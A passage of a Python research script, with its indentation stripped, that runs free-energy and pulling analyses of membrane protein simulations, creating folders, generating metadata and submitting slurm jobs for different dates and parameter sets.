do("make_metadata.py -m 18 -k 0.02")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
if submode == "":
do("make_metadata.py -m 18 -k 1000")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
if submode == "short":
do("make_metadata.py -m 21")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 3".format(mode))
elif submode == "low_t_":
do("make_metadata.py -m 20")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 4".format(mode))
cd("..")
cd("..")
cd("..")
if args.day == "nov21":
if args.mode == 1:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
data_folder = "all_data_folder/"
for sample_range_mode in range(1):
freeEnergy_folder = f"no_side_contraint_memb_3_rg_0.4_lipid_0.6_extended_{sample_range_mode}/"
# folder_list = ["memb_3_rg_0.1_lipid_1_extended"]
folder_list = ["no_side_contraint_memb_3_rg_0.4_lipid_0.6_extended"]
# submode_list = ["_no_energy"]
submode_list = [""]
for submode in submode_list:
for folder in folder_list:
move_data(data_folder, freeEnergy_folder, folder, sample_range_mode=sample_range_mode, sub_mode_name=submode)
cd(freeEnergy_folder)
for submode in submode_list:
for folder in folder_list:
cd(folder+submode)
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = bias
print(name)
do("rm -r "+name)
do("mkdir -p " + name)
cd(name)
for temp in temp_list:
if submode == "_no_energy":
do("make_metadata.py -m 18 -k 0.02")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
if submode == "":
do("make_metadata.py -m 18 -k 0.02")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
if submode == "short":
do("make_metadata.py -m 21")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 3".format(mode))
elif submode == "low_t_":
do("make_metadata.py -m 20")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 4".format(mode))
cd("..")
cd("..")
cd("..")
if args.day == "nov19":
if args.mode == 2:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
data_folder = "all_data_folder/"
for sample_range_mode in range(3):
freeEnergy_folder = f"nov_18_all_freeEnergy_calculation_sample_range_mode_{sample_range_mode}/"
# folder_list = ["memb_3_rg_0.1_lipid_1_extended"]
folder_list = ["new_next_gen_native_based_memb_3_rg_0.4_lipid_0.6_extended"]
submode_list = ["_no_energy"]
for submode in submode_list:
for folder in folder_list:
move_data(data_folder, freeEnergy_folder, folder, sample_range_mode=sample_range_mode, sub_mode_name=submode)
if args.mode == 1:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
data_folder = "all_data_folder/"
for sample_range_mode in range(3):
freeEnergy_folder = f"nov_18_all_freeEnergy_calculation_sample_range_mode_{sample_range_mode}/"
# folder_list = ["memb_3_rg_0.1_lipid_1_extended"]
folder_list = ["new_next_gen_native_based_memb_3_rg_0.4_lipid_0.6_extended"]
submode_list = ["short"]
for submode in submode_list:
for folder in folder_list:
move_data(data_folder, freeEnergy_folder, folder, sample_range_mode=sample_range_mode, sub_mode_name=submode)
cd(freeEnergy_folder)
for submode in submode_list:
for folder in folder_list:
cd(folder+submode)
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = bias
print(name)
do("rm -r "+name)
do("mkdir -p " + name)
cd(name)
for temp in temp_list:
if submode == "":
do("make_metadata.py -m 18 -k 0.02")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
if submode == "short":
do("make_metadata.py -m 21")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 3".format(mode))
elif submode == "low_t_":
do("make_metadata.py -m 20")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 4".format(mode))
cd("..")
cd("..")
cd("..")
if args.day == "nov18":
if args.mode == 1:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
data_folder = "all_data_folder/"
for sample_range_mode in range(3):
freeEnergy_folder = f"nov_18_all_freeEnergy_calculation_sample_range_mode_{sample_range_mode}/"
# folder_list = ["memb_3_rg_0.1_lipid_1_extended"]
folder_list = ["new_next_gen_native_based_memb_3_rg_0.4_lipid_0.6_extended"]
for folder in folder_list:
move_data(data_folder, freeEnergy_folder, folder, sample_range_mode=sample_range_mode)
submode_list = [""]
cd(freeEnergy_folder)
for folder in folder_list:
cd(folder)
for submode in submode_list:
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = submode+bias
print(name)
do("rm -r "+name)
do("mkdir -p " + name)
cd(name)
for temp in temp_list:
if submode == "":
do("make_metadata.py -m 18 -k 0.02")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
if submode == "short":
do("make_metadata.py -m 19")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 3".format(mode))
elif submode == "low_t_":
do("make_metadata.py -m 20")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 4".format(mode))
cd("..")
cd("..")
cd("..")
if args.mode == 2:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
data_folder = "all_data_folder/"
for sample_range_mode in range(3):
freeEnergy_folder = f"nov_18_all_freeEnergy_calculation_sample_range_mode_{sample_range_mode}_2/"
# folder_list = ["memb_3_rg_0.1_lipid_1_extended"]
folder_list = ["new_next_gen_native_based_memb_3_rg_0.4_lipid_0.6_extended"]
for folder in folder_list:
move_data(data_folder, freeEnergy_folder, folder, sample_range_mode=sample_range_mode)
submode_list = [""]
cd(freeEnergy_folder)
for folder in folder_list:
cd(folder)
for submode in submode_list:
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = submode+bias
print(name)
do("rm -r "+name)
do("mkdir -p " + name)
cd(name)
for temp in temp_list:
if submode == "":
do("make_metadata.py -m 18 -k 0.02")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
if submode == "short":
do("make_metadata.py -m 19")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 3".format(mode))
elif submode == "low_t_":
do("make_metadata.py -m 20")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 4".format(mode))
cd("..")
cd("..")
cd("..")
if args.day == "nov15":
if args.mode == 2:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
data_folder = "all_data_folder/"
freeEnergy_folder = "nov_15_all_freeEnergy_calculation/"
# do("mkdir " + freeEnergy_folder)
# folder_list = ["memb_3_rg_0.1_lipid_1_extended"]
# folder_list = ["rgWidth_memb_3_rg_0.1_lipid_1_extended",
# "rgWidth_memb_3_rg_0.1_lipid_1_topology",
# "expand_distance_rgWidth_memb_3_rg_0.1_lipid_1_extended",
# "next_gen_native_based_memb_3_rg_0.2_lipid_0.6_extended",
# "next_gen_native_based_memb_3_rg_0.4_lipid_0.6_extended",
# "next_gen_native_based_memb_3_rg_0.4_lipid_0.6_topology",
# "stronger_bias_for_expand_distance_rgWidth_memb_3_rg_0.1_lipid_1_extended"]
# folder_list = ["rgWidth_memb_3_rg_0.1_lipid_1_extended"]
folder_list = ["rgWidth_memb_3_rg_0.1_lipid_1_topology",
"expand_distance_rgWidth_memb_3_rg_0.1_lipid_1_extended",
"next_gen_native_based_memb_3_rg_0.2_lipid_0.6_extended",
"next_gen_native_based_memb_3_rg_0.4_lipid_0.6_extended",
"next_gen_native_based_memb_3_rg_0.4_lipid_0.6_topology",
"stronger_bias_for_expand_distance_rgWidth_memb_3_rg_0.1_lipid_1_extended"]
for folder in folder_list:
move_data(data_folder, freeEnergy_folder, folder, sample_range_mode=0)
submode_list = [""]
cd(freeEnergy_folder)
for folder in folder_list:
cd(folder)
for submode in submode_list:
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = submode+bias
print(name)
do("rm -r "+name)
do("mkdir -p " + name)
cd(name)
for temp in temp_list:
if submode == "":
if folder == "stronger_bias_for_expand_distance_rgWidth_memb_3_rg_0.1_lipid_1_extended":
do("make_metadata.py -m 18 -k 0.05")
else:
do("make_metadata.py -m 18 -k 0.02")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
cd("..")
cd("..")
if args.mode == 1:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
data_folder = "all_data_folder/"
for sample_range_mode in range(3):
freeEnergy_folder = f"nov_15_all_freeEnergy_calculation_sample_range_mode_{sample_range_mode}/"
# folder_list = ["memb_3_rg_0.1_lipid_1_extended"]
folder_list = ["memb_3_rg_0.1_lipid_1_topology"]
for folder in folder_list:
move_data(data_folder, freeEnergy_folder, folder, sample_range_mode=sample_range_mode)
submode_list = [""]
cd(freeEnergy_folder)
for folder in folder_list:
cd(folder)
for submode in submode_list:
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = submode+bias
print(name)
do("rm -r "+name)
do("mkdir -p " + name)
cd(name)
for temp in temp_list:
if submode == "":
do("make_metadata.py -m 18 -k 0.02")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
if submode == "short":
do("make_metadata.py -m 19")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 3".format(mode))
elif submode == "low_t_":
do("make_metadata.py -m 20")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 4".format(mode))
cd("..")
cd("..")
cd("..")
if args.day == "nov14":
if args.mode == 2:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
data_folder = "all_data_folder/"
freeEnergy_folder = "nov_14_all_freeEnergy_calculation/"
folder_list = ["stronger_bias_for_expand_distance_rgWidth_memb_3_rg_0.1_lipid_1_extended"]
for folder in folder_list:
move_data(data_folder, freeEnergy_folder, folder)
submode_list = [""]
cd(freeEnergy_folder)
for folder in folder_list:
cd(folder)
for submode in submode_list:
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = submode+bias
print(name)
do("rm -r "+name)
do("mkdir -p " + name)
cd(name)
for temp in temp_list:
if submode == "":
do("make_metadata.py -m 18 -k 0.05")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
if submode == "short":
do("make_metadata.py -m 19")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 3".format(mode))
elif submode == "low_t_":
do("make_metadata.py -m 20")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 4".format(mode))
cd("..")
cd("..")
if args.mode == 1:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
data_folder = "all_data_folder/"
freeEnergy_folder = "all_freeEnergy_calculation_nov14/"
folder_list = ["next_gen_native_based_memb_3_rg_0.4_lipid_0.6_topology"]
for folder in folder_list:
move_data(data_folder, freeEnergy_folder, folder)
submode_list = [""]
cd(freeEnergy_folder)
for folder in folder_list:
cd(folder)
for submode in submode_list:
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = submode+bias
do("rm -r "+name)
do("mkdir -p " + name)
cd(name)
for temp in temp_list:
if submode == "":
do("make_metadata.py -m 18")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
if submode == "short":
do("make_metadata.py -m 19")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 3".format(mode))
elif submode == "low_t_":
do("make_metadata.py -m 20")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 4".format(mode))
cd("..")
cd("..")
if args.day == "nov12":
if args.mode == 1:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
data_folder = "all_data_folder/"
freeEnergy_folder = "all_freeEnergy_calculation_nov11/"
folder_list = ["next_gen_native_based_memb_3_rg_0.4_lipid_0.6_extended"]
# for folder in folder_list:
# move_data(data_folder, freeEnergy_folder, folder)
submode_list = ["low_t_"]
cd(freeEnergy_folder)
for folder in folder_list:
cd(folder)
for submode in submode_list:
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = submode+bias
do("rm -r "+name)
do("mkdir -p " + name)
cd(name)
for temp in temp_list:
if submode == "":
do("make_metadata.py -m 18")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
if submode == "short":
do("make_metadata.py -m 19")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 3".format(mode))
elif submode == "low_t_":
do("make_metadata.py -m 20")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 4".format(mode))
cd("..")
cd("..")
if args.day == "nov11":
if args.mode == 1:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
data_folder = "all_data_folder/"
freeEnergy_folder = "all_freeEnergy_calculation_nov11/"
folder_list = ["next_gen_native_based_memb_3_rg_0.2_lipid_0.6_extended"]
for folder in folder_list:
move_data(data_folder, freeEnergy_folder, folder)
submode_list = [""]
cd(freeEnergy_folder)
for folder in folder_list:
cd(folder)
for submode in submode_list:
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = submode+bias
do("rm -r "+name)
do("mkdir -p " + name)
cd(name)
for temp in temp_list:
if submode == "":
do("make_metadata.py -m 18")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
# elif submode == "low_t_":
# do("make_metadata.py -m 16")
# do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 3".format(mode))
cd("..")
cd("..")
if args.mode == 2:
temp_list = ["all"]
# bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
bias_list = {"1d_dis":"9"}
data_folder = "all_data_folder/"
freeEnergy_folder = "all_freeEnergy_calculation_nov11_2/"
folder_list = ["next_gen_native_based_memb_3_rg_0.2_lipid_0.6_extended"]
for folder in folder_list:
move_data(data_folder, freeEnergy_folder, folder, krg=1)
submode_list = [""]
cd(freeEnergy_folder)
for folder in folder_list:
cd(folder)
for submode in submode_list:
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = submode+bias
do("rm -r "+name)
do("mkdir -p " + name)
cd(name)
for temp in temp_list:
if submode == "":
do("make_metadata.py -m 19")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 3".format(mode))
# elif submode == "low_t_":
# do("make_metadata.py -m 16")
# do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 3".format(mode))
cd("..")
cd("..")
if args.day == "nov09":
if args.mode == 1:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
data_folder = "all_data_folder/"
freeEnergy_folder = "all_freeEnergy_calculation_nov09/"
folder_list = ["expand_distance_rgWidth_memb_3_rg_0.1_lipid_1_extended"]
# for folder in folder_list:
# move_data(data_folder, freeEnergy_folder, folder, krg=5, klipid=0.8, kgo=0.5)
submode_list = [""]
cd(freeEnergy_folder)
for folder in folder_list:
cd(folder)
for submode in submode_list:
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = submode+bias
do("rm -r "+name)
do("mkdir -p " + name)
cd(name)
for temp in temp_list:
if submode == "":
do("make_metadata.py -m 17")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
elif submode == "low_t_":
do("make_metadata.py -m 16")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 3".format(mode))
cd("..")
cd("..")
if args.day == "nov08":
if args.mode == 2:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
# bias_list = {"2d_qw_dis":"11"}
# bias_list = {"1d_dis":"9", "1d_qw":"10"}
data_folder = "all_data_folder/"
freeEnergy_folder = "all_freeEnergy_calculation/"
# folder = "rgWidth_memb_3_rg_0.1_lipid_1_extended"
folder_list = ["rgWidth_memb_3_rg_0.1_lipid_1_topology",
"expand_distance_rgWidth_memb_3_rg_0.1_lipid_1_extended"]
folder_list = ["rgWidth_memb_3_rg_0.1_lipid_1_extended"]
folder_list = ["expand_distance_rgWidth_memb_3_rg_0.1_lipid_1_extended"]
folder_list = ["rgWidth_memb_3_rg_0.1_lipid_1_extended",
"rgWidth_memb_3_rg_0.1_lipid_1_topology",
"expand_distance_rgWidth_memb_3_rg_0.1_lipid_1_extended"]
# for folder in folder_list:
# move_data(data_folder, freeEnergy_folder, folder)
submode_list = ["", "low_t_"]
cd("all_freeEnergy_calculation")
for folder in folder_list:
cd(folder)
for submode in submode_list:
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = submode+bias
do("rm -r "+name)
do("mkdir -p " + name)
cd(name)
for temp in temp_list:
if submode == "":
do("make_metadata.py -m 17")
do("pulling_analysis.py -m {} --commons 0 --nsample 2500 --submode 2".format(mode))
elif submode == "low_t_":
do("make_metadata.py -m 16")
do("pulling_analysis.py -m {} --commons 0 --nsample 2500 --submode 3".format(mode))
cd("..")
cd("..")
if args.mode == 1:
pre = "/scratch/wl45/nov_2017/06nov/"
data_folder = "/scratch/wl45/nov_2017/06nov/all_data_folder/"
folder_list = ["rgWidth_memb_3_rg_0.1_lipid_1_extended",
"rgWidth_memb_3_rg_0.1_lipid_1_topology",
"expand_distance_rgWidth_memb_3_rg_0.1_lipid_1_extended"]
process_temper_data(pre, data_folder, folder_list)
if args.day == "nov07":
if args.mode == 5:
scancel_jobs_in_folder(".")
if args.mode == 4:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
# bias_list = {"2d_qw_dis":"11"}
# bias_list = {"1d_dis":"9", "1d_qw":"10"}
data_folder = "all_data_folder/"
freeEnergy_folder = "all_freeEnergy_calculation/"
# folder = "rgWidth_memb_3_rg_0.1_lipid_1_extended"
folder_list = ["rgWidth_memb_3_rg_0.1_lipid_1_topology",
"expand_distance_rgWidth_memb_3_rg_0.1_lipid_1_extended"]
folder_list = ["rgWidth_memb_3_rg_0.1_lipid_1_extended"]
folder_list = ["expand_distance_rgWidth_memb_3_rg_0.1_lipid_1_extended"]
folder_list = ["rgWidth_memb_3_rg_0.1_lipid_1_extended",
"rgWidth_memb_3_rg_0.1_lipid_1_topology",
"expand_distance_rgWidth_memb_3_rg_0.1_lipid_1_extended"]
# for folder in folder_list:
# move_data(data_folder, freeEnergy_folder, folder)
submode_list = ["", "low_t_"]
cd("all_freeEnergy_calculation")
for folder in folder_list:
cd(folder)
for submode in submode_list:
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = submode+bias
do("mkdir -p " + name)
cd(name)
for temp in temp_list:
# do("make_metadata.py -m 16")
do("pulling_analysis.py -m {} --commons 0 --nsample 2500 --submode 2".format(mode))
cd("..")
cd("..")
if args.mode == 3:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
# bias_list = {"2d_qw_dis":"11"}
# bias_list = {"1d_dis":"9", "1d_qw":"10"}
data_folder = "all_data_folder/"
freeEnergy_folder = "all_freeEnergy_calculation/"
# folder = "rgWidth_memb_3_rg_0.1_lipid_1_extended"
folder_list = ["rgWidth_memb_3_rg_0.1_lipid_1_topology",
"expand_distance_rgWidth_memb_3_rg_0.1_lipid_1_extended"]
for folder in folder_list:
move_data(data_folder, freeEnergy_folder, folder)
cd("all_freeEnergy_calculation")
for folder in folder_list:
cd(folder)
for bias, mode in bias_list.items():
do("mkdir -p " + bias)
cd(bias)
for temp in temp_list:
do("make_metadata.py -m 15")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
cd("..")
cd("..")
if args.mode == 2:
data_folder = "all_data_folder/"
freeEnergy_folder = "all_freeEnergy_calculation/"
folder = "rgWidth_memb_3_rg_0.1_lipid_1_extended"
move_data(data_folder, freeEnergy_folder, folder)
if args.mode == 1:
pre = "/scratch/wl45/nov_2017/06nov/"
data_folder = "/scratch/wl45/nov_2017/06nov/all_data_folder/"
folder_list = [
"expand_distance_rgWidth_memb_3_rg_0.1_lipid_1_extended"
]
process_temper_data(pre, data_folder, folder_list)
if args.day == "nov05":
if args.mode == 1:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
# bias_list = {"2d_qw_dis":"11"}
# bias_list = {"1d_dis":"9", "1d_qw":"10"}
for bias, mode in bias_list.items():
do("mkdir -p " + bias)
cd(bias)
for temp in temp_list:
do("make_metadata.py -m 12")
do("mkdir t_" + temp)
do("mv metadatafile t_" + temp)
cd("t_" + temp)
do("pulling_analysis.py -m {} --commons 0 --nsample 2500 --submode 1".format(mode))
cd("..")
cd("..")
# cmd = "find -name 'slurm-*' | rev | awk -F'[-.]' '{print $2}' | rev"
# lines = getFromTerminal(cmd).splitlines()
# for line in lines:
# print(line)
# do("scancel " + line)
if args.day == "oct31":
if args.mode == 4:
# folder_list = ["rg_0.4_lipid_2_extended", "rg_0.4_lipid_2_topology"]
folder_list = ["memb_3_rg_0.1_lipid_1_extended", "memb_3_rg_0.1_lipid_1_topology"]
# folder_list = ["rgWidth_memb_3_rg_0.1_lipid_1_extended", "rgWidth_memb_3_rg_0.1_lipid_1_topology"]
# folder_list = ["more_higher_temp_topology"]
temp_list = ["all", "500"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
for folder in folder_list:
cd(folder)
for bias, mode in bias_list.items():
do("mkdir -p " + bias)
cd(bias)
for temp in temp_list:
if temp != "all":
do("make_metadata.py -m 10 --submode 3 -t " + temp)
else:
do("make_metadata.py -m 9 --submode 3")
do("mkdir t_" + temp)
do("mv metadatafile t_" + temp)
cd("t_" + temp)
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 1".format(mode))
cd("..")
cd("..")
cd("..")
if args.mode == 3:
# folder_list = ["rg_0.4_lipid_2_extended", "rg_0.4_lipid_2_topology"]
# folder_list = ["memb_2_rg_0.1_lipid_1_extended", "memb_2_rg_0.1_lipid_1_topology"]
folder_list = ["rgWidth_memb_3_rg_0.1_lipid_1_extended", "rgWidth_memb_3_rg_0.1_lipid_1_topology"]
# folder_list = ["more_higher_temp_topology"]
temp_list = ["all", "500"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
for folder in folder_list:
cd(folder)
for bias, mode in bias_list.items():
do("mkdir -p " + bias)
cd(bias)
for temp in temp_list:
if temp != "all":
do("make_metadata.py -m 10 --submode 3 -t " + temp)
else:
do("make_metadata.py -m 9 --submode 3")
do("mkdir t_" + temp)
do("mv metadatafile t_" + temp)
cd("t_" + temp)
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 1".format(mode))
cd("..")
cd("..")
cd("..")
if args.mode == 2:
# folder_list = ["rg_0.4_lipid_2_extended", "rg_0.4_lipid_2_topology"]
# folder_list = ["memb_2_rg_0.1_lipid_1_extended", "memb_2_rg_0.1_lipid_1_topology"]
folder_list = ["rgWidth_memb_3_rg_0.1_lipid_1_extended", "rgWidth_memb_3_rg_0.1_lipid_1_topology"]
# folder_list = ["more_higher_temp_topology"]
temp_list = ["all", "500"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
for folder in folder_list:
cd(folder)
for bias, mode in bias_list.items():
do("rm -r " + bias)
cd("..")
if args.mode == 1:
# folder_list = ["rg_0.4_lipid_2_extended", "rg_0.4_lipid_2_topology"]
# folder_list = ["memb_2_rg_0.1_lipid_1_extended", "memb_2_rg_0.1_lipid_1_topology"]
folder_list = ["rgWidth_memb_3_rg_0.1_lipid_1_extended", "rgWidth_memb_3_rg_0.1_lipid_1_topology"]
# folder_list = ["more_higher_temp_topology"]
temp_list = ["all", "500"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
for folder in folder_list:
cd(folder)
for bias, mode in bias_list.items():
do("mkdir -p " + bias)
cd(bias)
for temp in temp_list:
if temp != "all":
do("make_metadata.py -m 10 --submode 1 -t " + temp)
else:
do("make_metadata.py -m 9 --submode 1")
do("mkdir t_" + temp)
do("mv metadatafile t_" + temp)
cd("t_" + temp)
do("pulling_analysis.py -m {} --commons 0 --nsample 2500 --submode 1".format(mode))
cd("..")
cd("..")
cd("..")
if args.day == "oct28":
if args.mode == 1:
# folder_list = ["rg_0.4_lipid_2_extended", "rg_0.4_lipid_2_topology"]
# folder_list = ["memb_2_rg_0.1_lipid_1_extended", "memb_2_rg_0.1_lipid_1_topology"]
folder_list = ["memb_3_rg_0.1_lipid_1_extended", "memb_3_rg_0.1_lipid_1_topology"]
# folder_list = ["more_higher_temp_topology"]
temp_list = ["all", "500"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
for folder in folder_list:
cd(folder)
for bias, mode in bias_list.items():
do("mkdir -p " + bias)
cd(bias)
for temp in temp_list:
if temp != "all":
do("make_metadata.py -m 10 --submode 1 -t " + temp)
else:
do("make_metadata.py -m 9 --submode 1")
do("mkdir t_" + temp)
do("mv metadatafile t_" + temp)
cd("t_" + temp)
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 1".format(mode))
cd("..")
cd("..")
cd("..")
if args.day == "oct25":
if args.mode == 1:
compute_theta_for_each_helix()
print("Done")
if args.mode == 2:
# folder_list = ["rg_0.4_lipid_2_extended", "rg_0.4_lipid_2_topology"]
# folder_list = ["memb_2_rg_0.1_lipid_1_extended", "memb_2_rg_0.1_lipid_1_topology"]
folder_list = ["memb_3_rg_0.1_lipid_1_extended", "memb_3_rg_0.1_lipid_1_topology"]
# folder_list = ["more_higher_temp_topology"]
temp_list = ["all", "500"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
for folder in folder_list:
cd(folder)
for bias, mode in bias_list.items():
do("mkdir -p " + bias)
cd(bias)
for temp in temp_list:
if temp != "all":
do("make_metadata.py -m 10 -t " + temp)
else:
do("make_metadata.py -m 9")
do("mkdir t_" + temp)
do("mv metadatafile t_" + temp)
cd("t_" + temp)
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 1".format(mode))
cd("..")
cd("..")
cd("..")
if args.day == "oct24":
if args.mode == 2:
cmd = 'tail -n 1 log.lammps | cut -d" " -f2-'
line = getFromTerminal(cmd).rstrip()
print(line)
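    # mode 1: restart every dis_* window; reuse log0/log.lammps, convert the
    # trajectory so far, then resubmit with the 2xov_0 -> 2xov_1 names patched by sed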
if args.mode == 1:
dis_list = glob.glob("dis_*")
print(dis_list)
for dis in dis_list:
cd(dis)
do("cp log0/log.lammps .")
continueRunConvertion()
# do("mkdir log0")
# do("mv log.* log0/")
# do("mkdir 1")
do("sed 's/2xov_0/2xov_1/g' run_0.slurm > run_1.slurm")
do("sbatch run_1.slurm")
cd("..")
# continueRunConvertion()
if args.day == "oct21":
if args.mode == 1:
# folder_list = ["rg_0.4_lipid_2_extended", "rg_0.4_lipid_2_topology"]
# folder_list = ["memb_2_rg_0.1_lipid_1_extended", "memb_2_rg_0.1_lipid_1_topology"]
folder_list = ["memb_3_rg_0.1_lipid_1_extended", "memb_3_rg_0.1_lipid_1_topology"]
# folder_list = ["more_higher_temp_topology"]
temp_list = ["all", "450"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
for folder in folder_list:
cd(folder)
for bias, mode in bias_list.items():
do("mkdir -p " + bias)
cd(bias)
for temp in temp_list:
if temp != "all":
do("make_metadata.py -m 10 -t " + temp)
else:
do("make_metadata.py -m 9")
do("mkdir t_" + temp)
do("mv metadatafile t_" + temp)
cd("t_" + temp)
do("pulling_analysis.py -m {} --commons 0 --nsample 2500".format(mode))
cd("..")
cd("..")
cd("..")
if args.mode == 2:
# folder_list = ["rg_0.4_lipid_2_extended", "rg_0.4_lipid_2_topology"]
folder_list = ["memb_2_rg_0.1_lipid_1_extended", "memb_2_rg_0.1_lipid_1_topology"]
# folder_list = ["more_higher_temp_topology"]
temp_list = ["important_all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
for folder in folder_list:
cd(folder)
for bias, mode in bias_list.items():
do("mkdir -p " + bias)
cd(bias)
for temp in temp_list:
do("make_metadata.py -m 9")
do("rm t_t_" +temp)
do("mkdir -p t_t_" + temp)
do("mv metadatafile t_t_" + temp)
cd("t_t_" + temp)
do("pulling_analysis.py -m {} --commons 0 --nsample 2500".format(mode))
cd("..")
cd("..")
cd("..")
if args.day == "oct17":
if args.mode == 1:
print("can it fold")
# start_from_list=["native", "extended", "topology"]
# start_from_list=["native"]
start_from_list=["extended", "topology"]
mode_list = [3] # lipid mediated interaction
# pressure_list = [0, 0.1, 1.0]
pressure_list = [0, 1, 2]
force_ramp_rate_list=[1]
temperature_list=[350, 500]
memb_k_list = [1, 2, 4]
rg_list = [0, 0.1, 0.4]
force_list = [0.0]
repeat = 2
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
rg_list=rg_list,
memb_k_list=memb_k_list,
mode_list=mode_list,
pressure_list=pressure_list,
force_ramp_rate_list=force_ramp_rate_list,
force_list=force_list,
repeat=repeat,
commons=1)
if args.day == "oct16":
if args.mode == 1:
# folder_list = ["rg_0.4_lipid_2_extended", "rg_0.4_lipid_2_topology"]
folder_list = ["more_higher_temp"]
# folder_list = ["more_higher_temp_topology"]
temp_list = ["all", "350", "400", "450", "500"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
for folder in folder_list:
cd(folder)
for bias, mode in bias_list.items():
do("mkdir -p " + bias)
cd(bias)
for temp in temp_list:
if temp != "all":
do("make_metadata.py -m 10 -t " + temp)
else:
do("make_metadata.py -m 9")
